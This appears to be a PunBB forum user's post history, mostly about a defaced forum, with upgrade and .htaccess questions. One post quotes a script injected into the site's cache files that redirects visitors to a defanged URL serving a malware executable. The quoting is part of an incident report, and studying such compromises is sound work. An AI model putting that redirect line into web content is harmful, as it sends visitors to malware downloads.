Hi Folks,

I know this is an off topic question but does anyone know where I could find a list of older add-on extensions for Firefox 2.0?. I've been looking all over the web and cannot seem to find anything.

Any help to this would be most appreciated!

Thanks

Thanks for the reply Smartys!!! This answers my question..

Thanks! -:)

Hi folks,

I have a question, I want to upgrade my PunBB 1.2.6 to the newest 1.2.15 version, and I was wondering whats the simplest way to do this?? Do I use the hdiff doc file for (PunBB 1.2.6 to 1.2.15) to upgrade each file?? Also, do I have to run the punbb-1.2.15/upload/install.php file again to update the sql database?? Or do I just run the 12_to_1215_update.php??

Anyone's help & advise would be most apreciated!

Thanks

4

(3 replies, posted in General discussion)

elbekko wrote:

Not unless they have access to your server.

I see... Maybe thats the reason. I should make my password then harder to crack.

Thanks Again for your help!

5

(3 replies, posted in General discussion)

Hi Folks,

I have a question, is it possible for someone to hack/change/remove META tags from a static html page?? Cause I think that happen to me. . . Just wondering if its possible.

Thanks!

6

(24 replies, posted in PunBB 1.2 discussion)

Just a final thought, since this vulnerability that had exploited my cache directory, its my assumption they got in through a command-line access since the cache directory and cache files were world-writable and easily accessed this way. Maybe any world-writable files or data that stored in the www in the next punbb version should instead be stored in the MySql database instead to better avoid this type of furture happenings.

Just my thought though, but thanks to everyone who had helped me with my problem.

Cheers!

7

(24 replies, posted in PunBB 1.2 discussion)

Smartys wrote:
<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>

Thanks Smarty!!!! Appreciate it!!!

Cheers

8

(24 replies, posted in PunBB 1.2 discussion)

Oh really? You mean their is already supost to be a .htaccess file in there? Guess that guy removed it then too.

Smarty, do me a favor if you can, past me over the the .htaccess code for that cache folder so I can re-generate a new .htaccess file to stick back in there. Would appreciate!

Thanks!

9

(24 replies, posted in PunBB 1.2 discussion)

Hi Smarty,

Would it be possible to throw in a .htaccess file in the the cache folder or any other "writable folders" to stop someone from accessing php files? Say something like this::

<Files *.php>
Deny from all
</Files>

Would this work? Just wondering...

Thanks

10

(24 replies, posted in PunBB 1.2 discussion)

It looks like the intruder managed to gain sufficient access to overwrite all world writable files and add files to world writable directories (i.e. files and folders with 666 or 777 permissions). That suggests that it's likely that access was gained via an insecure PHP script rather than by someone logging into via FTP under my username and password.

11

(24 replies, posted in PunBB 1.2 discussion)

Ok, i'll do that.

Thanks Man!

12

(24 replies, posted in PunBB 1.2 discussion)

Smartys wrote:

I can't be certain, but my guess is that the person had some other access to your forum (ie: they compromised another site) and then used a script to deface more sites on the same server

Smarty, how did this person manage to get into my site to do this stuff??? Do I have a loop hole somewhere??? And how do I prevent this from happening again??

13

(24 replies, posted in PunBB 1.2 discussion)

I think your right. I also have a stand alone event calendar which I just found out that all of my (xml) files had been hacked too....... Oh boy.......

Thanks Smarty for the info!

14

(24 replies, posted in PunBB 1.2 discussion)

I cannot figure how that person cleared my cache quickjump files of all content to stick that scripting code in all of them? Including uploading a index.htm into my cache folder with that same coding?

Sssshhhheeesh......

15

(24 replies, posted in PunBB 1.2 discussion)

Hi Smarty,

Ok, I'll send you files....

16

(24 replies, posted in PunBB 1.2 discussion)

Didn't find anything in my sql database. But when I checked my "cache", they're it WAS!!!! ...WOW!!!! Some how that person got a "index.htm" and a "index.php" file to load into my cache directory folder, and into some of my cache_quickjump files!!!! ..Shit!!!


This is what I found in the index.htm file and my quickjump files::

<script>location.href="h-t-t-p://w-w-w-.mkekilli.com/giris.exe";</script>


Since I am not a coder, How the hell did this person get this stuff into my cache folder???

17

(24 replies, posted in PunBB 1.2 discussion)

Yes, its the "Calendar" mod..

Somehow stuck that coding in the calendar posts ( i think). Checking now....

18

(24 replies, posted in PunBB 1.2 discussion)

Infact I found this malicious coding to be posted in my "Calendar". Seems when I try to look at my calendar, the program will try to auto open. The file name is "giris.exe". Seams to iminating/parsing from URL (mkekilli.com)

Got to try and delete calendar db/content to clear this malicious coding.


PS...... DON'T CLICK ON THE LINK, I JUST FOUND OUT THAT IT WILL DOWNLOAD!!!!! .....YIKES!!!!


I took out the www. Should be safe now. But do not open.

19

(24 replies, posted in PunBB 1.2 discussion)

Hi,

Is it possible to for someone to input some form of coding/html into a textarea field within a users profile that will be an (.exe) executable file (auto opening) to disrupt/hack or crash a punbb forum?? Cause I think it happen to me from a new user who had just signed up. When I went to log on to my forum, everything was looking really "haywire" until I got a chance to delete that user then everything cleared up after that. Sshhhhhh......

Has this happen to anyone else?

Hi guardian34,

It worked fine and just what I wanted!! Thank you sooooo very much!!!

Cheers

Hi guardian34,

Thanks for the reply... Wow, thanks man!.... I give it a try!!

Cheers! smile

Hi,

I have a question, in regard to the e-mail that is sent to the Admin from the forum of the alert of a new signed up user - would it be possible to also have the users "IP" address displayed on that same e-mail message?? If so how can this be done?

Any idea to this would be appreciated...

Thanks

Hi Pogenwurst,

I thought so. But, geeeeee's does that thing "hang" when you activate that plugin!. It reminds me of that extern.php script when it pulls data from the database...lol...

Thanks

BTW,  Smarty I noticed after installing this script, that I have a harder time moving around on my site. Does this plugin put a 'heavy load' on the server / database?

Just wondering....

Ok.... I understand....Thanks Again for da info!!!!

Cheers!